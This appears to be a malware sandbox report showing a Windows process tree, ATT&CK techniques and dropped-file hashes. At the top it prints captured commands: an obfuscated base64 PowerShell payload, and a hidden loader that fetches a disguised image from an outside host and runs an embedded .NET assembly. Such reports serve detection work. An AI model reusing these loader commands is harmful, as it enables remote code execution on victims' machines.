@$#I#@$##@$#9#@$#C#@$##@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C4#@$#RwBl#@$#HQ#@$#TQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#K#@$##@$#n#@$#FY#@$#QQBJ#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#YQBy#@$#Gc#@$#dQBt#@$#GU#@$#bgB0#@$#HM#@$#I#@$##@$#9#@$#C#@$##@$#L#@$##@$#o#@$#Cc#@$#d#@$#B4#@$#HQ#@$#LgBz#@$#GU#@$#bgB5#@$#G0#@$#Lw#@$#4#@$#DQ#@$#Mg#@$#u#@$#DE#@$#NQ#@$#u#@$#DY#@$#Nw#@$#u#@$#D#@$##@$#O#@$##@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
  2⤵
  PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.senym/842.15.67.08//:ptth');$method.Invoke($null, $arguments)"
    3⤵
    PID:1048

C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe
"C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe"
1⤵
PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RbsgeknsO.bat" "
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c mkdir "\\?\C:\Windows "
    3⤵
    PID:4852

C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
1⤵
PID:3496
- C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
  2⤵
  PID:404

C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
1⤵
PID:4048
- C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
  "C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
  2⤵
  PID:5104

C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
1⤵
PID:2296

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
1⤵
PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
  2⤵
  PID:1780
- - C:\comRuntimeCrtdll\agentbrowser.exe
    "C:\comRuntimeCrtdll\agentbrowser.exe"
    3⤵
    PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
1⤵
PID:2144
- C:\comRuntimeCrtdll\agentbrowser.exe
  "C:\comRuntimeCrtdll\agentbrowser.exe"
  2⤵
  PID:2536

C:\Users\Admin\AppData\Local\Tempwinlogon.exe
"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
1⤵
PID:1116
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe"
  2⤵
  PID:1780

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
1⤵
PID:4088

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
1⤵
PID:3584

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff6d0e46f8,0x7fff6d0e4708,0x7fff6d0e4718
  2⤵
  PID:780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2852 /prefetch:8
  2⤵
  PID:4756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:3676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
  2⤵
  PID:3444
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2548 /prefetch:2
  2⤵
  PID:868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
  2⤵
  PID:2848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10620440946076400606,5367675788030712452,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
  2⤵
  PID:4804

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4124

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 388 -ip 388
1⤵
PID:1536

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 388 -s 3664
1⤵
- Program crash
PID:4944

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3636

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:4608
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4608 -s 3644
  2⤵
  - Program crash
  PID:4448

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4608 -ip 4608
1⤵
PID:4988

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:3740
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3740 -s 3440
  2⤵
  - Program crash
  PID:1744

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\69902a92d8b14946b5ce20cbff6aa3aa /t 3204 /p 436
1⤵
PID:2640

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 628 -p 3740 -ip 3740
1⤵
PID:4300

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:4868
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:4992
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    3⤵
    PID:4892
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1728769490\1348298946" -parentBuildID 20221007134813 -prefsHandle 1784 -prefMapHandle 1776 -prefsLen 20938 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {63b6619b-8869-4c1c-b544-288163fb025b} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1944 1c2bfbd7c58 gpu
      4⤵
      PID:5016
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.1884509601\1799933842" -parentBuildID 20221007134813 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 20974 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b20167a8-cc63-47aa-89e5-91e8544779f1} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2412 1c2bf6e2258 socket
      4⤵
      PID:560

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1260

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5008

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3204
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
  2⤵
  - Program crash
  PID:3988
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3204 -s 4092
  2⤵
  - Program crash
  PID:556

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:4792

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 3204 -ip 3204
1⤵
PID:3156

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1404

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4412
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4412 -s 3676
  2⤵
  - Program crash
  PID:2168

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 4412 -ip 4412
1⤵
PID:4140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\images.exe

Filesize
98KB

MD5
20390c8434f741d1abee9c8d48248bdb

SHA1
10577df5ed0ecba6a3da8552d112bd5e00e793d2

SHA256
ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3

SHA512
e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

Download Submit
C:\ProgramData\images.exe

Filesize
98KB

MD5
20390c8434f741d1abee9c8d48248bdb

SHA1
10577df5ed0ecba6a3da8552d112bd5e00e793d2

SHA256
ab87db3a4dc092240719fe8d9f0192b15dbeaa25ee21ef6607ef5e2cb6f775e3

SHA512
e1cd502740eb8bc267c7ca61c1781225f598b17948b0c6f99d8495efb27181a34075b7b5a89b775e1b9ac7cccfb5f2cc32fb61dbdf8cda9ac795349745bdd98b

Download Submit
C:\ProgramData\yul\logs.dat

Filesize
306B

MD5
a1b6bd2a98f951e5c37e51937f98fa6b

SHA1
0579fcfef9fd54ee63182e5e6394854c90a3be22

SHA256
e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63

SHA512
e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc

Download Submit
C:\ProgramData\yul\logs.dat

Filesize
1KB

MD5
b0b45f6d418596b2ab5f132e05cfb376

SHA1
961ef514cdd54d6bc110d15f52598738924d4a2a

SHA256
bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc

SHA512
1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b

Download Submit
C:\ProgramData\yul\logs.dat

Filesize
1KB

MD5
2836bcba3c461e607845ae3518136579

SHA1
54d2d37cf9065da0f09b69836f6c975f396ec54e

SHA256
2b719d741defad231508d3130894c3d4ec86c2ed9deed630f60ffdab958d03b8

SHA512
27ba541a466ac7e5005d048c803b8ace84447f30a4c567f36f62db2bce3db68fe303f81b2801fded13ae691b3a3d259c7fe3b181935c1b0b0b432862afb42d93

Download Submit
C:\ProgramData\yul\logs.dat

Filesize
2KB

MD5
b97beaf3b95f3b354a19a93bdc36bb1a

SHA1
587348dc61688a3537711d9af922527b2813b33a

SHA256
001413fa305b4830a173cdf2ff7eeb26c3615152599aad9c3d01b4011e837469

SHA512
1073b1ef95677eaeccedabcb73eaed26fa7240911bc3cd83e440bdf7a59e5b842f29fcb0e7be6a3e726ee099110d33101f8e4d05e9a2eb618e13cf8786fe0ae0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe.log

Filesize
1KB

MD5
8ec831f3e3a3f77e4a7b9cd32b48384c

SHA1
d83f09fd87c5bd86e045873c231c14836e76a05c

SHA256
7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982

SHA512
26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

Filesize
150B

MD5
68fa59d779f4eb04d362576c6fb94e2c

SHA1
d5a109ae8016acfd7bb3d65bbc341e4a49124440

SHA256
e9c61db580d4b5eafb3681cab191093f5f79658f177194b69adfb494be93f9e9

SHA512
0169107e26c1c98babd0b4b183f4c6f19963ad49746581bd17dc0da2da49c9799bfbd07330452c04c5ff13755e01a2abf22e6616441732db5ea777f2d19bdd36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\2ef51b0b-cfd8-4053-8a0b-4a347e633aea.dmp

Filesize
6.2MB

MD5
5fd2eecf02dcf3ddf8aee535c7a1db6a

SHA1
f33a8ae0d5d702a9d514d6c94e6dab44c1e40fbc

SHA256
a0513f0d95a3ac31ee323e6ebc86be968c80ccc422809b6c5b6c2e1f215111ed

SHA512
eb3e0087a78f99f56afb9ef9a2c63f30f2e0e95024454f0d9f44fba10926503953c1520ae1683675551b4adad1d30b2ad1c1fc5ebd1bc373ad8590cc60151d64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\54f09ac1-8b24-4a8f-96d4-6acc4f9702d1.dmp

Filesize
10.7MB

MD5
796c1a70e6f7776a60909fedc56f3a06

SHA1
ef86a3a85da5d1f9063af289f3e1b35580066544

SHA256
c7e7bcaead2c9a6ae058aa18a6575a6b6ea8ca74ba567a543d94819d7dab0b91

SHA512
9c73f1ad9e60320cd9d85b5a0604b9024be32894065c015fb5b8c438e8a49a185eb48bbd3904aaa5c89325b3cc1709ed670425b08290ea3d4384c34bea9d7a02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b950ebe404eda736e529f1b0a975e8db

SHA1
4d2c020f1aa70e2bcb666a2dd144d1f3588430b8

SHA256
bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4

SHA512
6ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
bd5bee5b228c95f791498ec97b68bedd

SHA1
40f2ba525e44b2c255c86ce70bdba39f5055441f

SHA256
5aea469b4ca99d337284f85a8460338daa883c28a0b5a8a6ea1f67cd11ee0170

SHA512
a131d6512ec145c7ec3a5a742af5c4195f142c7b8b937c0953056f7c79f3e7ae136fbd12db4a73e0b1b2a30c0a42e682a541646d15ae2b3e40d11196f3f3fca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9b62544d156bc6b7302664fd5362b679

SHA1
360c1a42f2f7d7eba5416b84c505ae4c175bd71a

SHA256
c0a28e342325c08a2a230b552a945d943acd8f964e2c5c9a0cd6994236ca361d

SHA512
18c34d1aca9339473649948edae27ec65003b7f57a5c5e3aef6af642be4066542a0344702317362da5cd08346db5b37ce7625f1de14dfe35562293f8ccae3bd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
ca36933e6dea7aa507a272121b34fdbb

SHA1
3b4741ca0308b345de5ecf6c3565b1dbacb0fb86

SHA256
fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d

SHA512
5a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
e329cc2ec5712aaec3a3fde3b7a622e9

SHA1
b7df68579017ea07eafa90db5192df1de29758e4

SHA256
fbbc440416fea58389ccf4e14bfe665223dbb17c744f4d0c56e49eef751cbb5d

SHA512
945a7a769e52846d4c06cff3064479f742c2a1d329e5f046c8cb59e83f5fa135818cbb131c01868da1e29dc670115009ac7fe443045c7f47530c1fce73bb85f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.CampaignStates.json

Filesize
502B

MD5
75a71302083de37606971fb174fc2451

SHA1
f274276bd76eee51a5fa5a1a6b233cfcf768ffcd

SHA256
fb64ee8bc1611a0ee95c475c149e603e5751758e0847bad24cc5fd0fce2198c4

SHA512
1554270d82402f0c3073d89765abb89d0d881d517e0861019c2d44a0af8cd72e7b7a3225d8cb6b4b207a77db6a0a1f335e042280fb0ef4fcb46656849ccb4984

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.GovernedChannelStates.json

Filesize
417B

MD5
c56ff60fbd601e84edd5a0ff1010d584

SHA1
342abb130dabeacde1d8ced806d67a3aef00a749

SHA256
200e8cc8dd12e22c9720be73092eafb620435d4569dbdcdba9404ace2aa4343c

SHA512
acd2054fddb33b55b58b870edd4eb6a3cdd3131dfe6139cb3d27054ac2b2a460694c9be9c2a1da0f85606e95e7f393cf16868b6c654e78a664799bc3418da86e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.Settings.json

Filesize
87B

MD5
e4e83f8123e9740b8aa3c3dfa77c1c04

SHA1
5281eae96efde7b0e16a1d977f005f0d3bd7aad0

SHA256
6034f27b0823b2a6a76fe296e851939fd05324d0af9d55f249c79af118b0eb31

SHA512
bd6b33fd2bbce4a46991bc0d877695d16f7e60b1959a0defc79b627e569e5c6cac7b4ad4e3e1d8389a08584602a51cf84d44cf247f03beb95f7d307fbba12bb9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyEventActivityStats.json

Filesize
14B

MD5
6ca4960355e4951c72aa5f6364e459d5

SHA1
2fd90b4ec32804dff7a41b6e63c8b0a40b592113

SHA256
88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3

SHA512
8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Excel.SurveyHistoryStats.json

Filesize
14B

MD5
6ca4960355e4951c72aa5f6364e459d5

SHA1
2fd90b4ec32804dff7a41b6e63c8b0a40b592113

SHA256
88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3

SHA512
8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Word.SurveyEventActivityStats.json

Filesize
14B

MD5
6ca4960355e4951c72aa5f6364e459d5

SHA1
2fd90b4ec32804dff7a41b6e63c8b0a40b592113

SHA256
88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3

SHA512
8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\10194C65-FC8E-413C-AF23-8732E6E6A1CA

Filesize
156KB

MD5
0b1f5b87f25cc675c67d233481e9ba9c

SHA1
a4582194b1bdc905019fe18c6bf34acc95261507

SHA256
1e7f0a806164ba62fcd57198b9a55bea975f7c79a71443a032e79338434378dc

SHA512
7503640d5e963e5630d1dae7fa713b5cad463e3ab4577c9d5410397d5fcf04fce677ad97fded19725a2fd607d39a912bb23aae18c414bc200a71e85635d8c597

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
323KB

MD5
9727b1893f4a4adc3107a50a77813c8e

SHA1
93f76aa52461deeeb49672f7dd497cef15470186

SHA256
a5faca4539374a78a69ef31163e96a358c49014fb3e1fa413f4463b008499d51

SHA512
acf7309e548ba621e94c32b9062149670012bea2eaf280b97359f2ece6d61e7d60eabeb295c7690b42ed3c52982b317d96aa6205cb58fa44dcd553d8468751d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\424402D6.emf

Filesize
1.4MB

MD5
d69c22a341e111feea69df6d8c655d60

SHA1
ac862337f2efa43627508927f5052ce694012206

SHA256
05b2053bf1d070d6034b45cd79b54d80da3c6d88d016671a345e75048b1a68db

SHA512
d4db33ed046b3c9ba09c4b3feac17b1fe2e75fce67f4154fd795d504708c295a1e3c8331ed3d6c3ee9950c936c4cc25b5d690558c26f2e1f7771bd5eb275822c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GVVED0TI\json[1].json

Filesize
323B

MD5
